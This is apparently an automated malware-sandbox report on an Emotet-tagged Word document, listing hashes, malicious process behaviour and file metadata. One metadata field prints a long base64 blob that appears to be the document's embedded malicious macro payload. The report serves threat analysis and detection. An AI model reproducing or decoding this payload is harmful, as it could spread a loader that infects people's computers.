analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Untitled-attachment-01222019.doc

Full analysis: https://app.any.run/tasks/c26f6d0d-78cc-4167-9593-4af2387a36e5
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 19:53:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

176EBC1F9B13C5967250154CEC968560

SHA1:

0AFDF4895BC2A8637B14477B052D3FF9666DFFCE

SHA256:

577FB0CDC3747915779DB95E7613E08BC1486ACDBF0F8543655CA2933C4FE540

SSDEEP:

3072:XmOEhGQCmUchjL/xSu90OoiLuDKZXfwKeljR1z:X/EhGQCmUc5xUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2956)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2956)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2572)
    • Application was dropped or rewritten from another process

      • 101.exe (PID: 2324)
      • 101.exe (PID: 3240)
      • wabmetagen.exe (PID: 3096)
      • wabmetagen.exe (PID: 3668)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3068)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2596)
    • Application launched itself

      • cmd.exe (PID: 2572)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4012)
      • cmd.exe (PID: 2572)
    • Creates files in the user directory

      • powershell.exe (PID: 3068)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3068)
      • 101.exe (PID: 3240)
    • Starts itself from another location

      • 101.exe (PID: 3240)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3068)
      • 101.exe (PID: 3240)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2956)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2956)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:22 16:49:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 16:49:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: 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 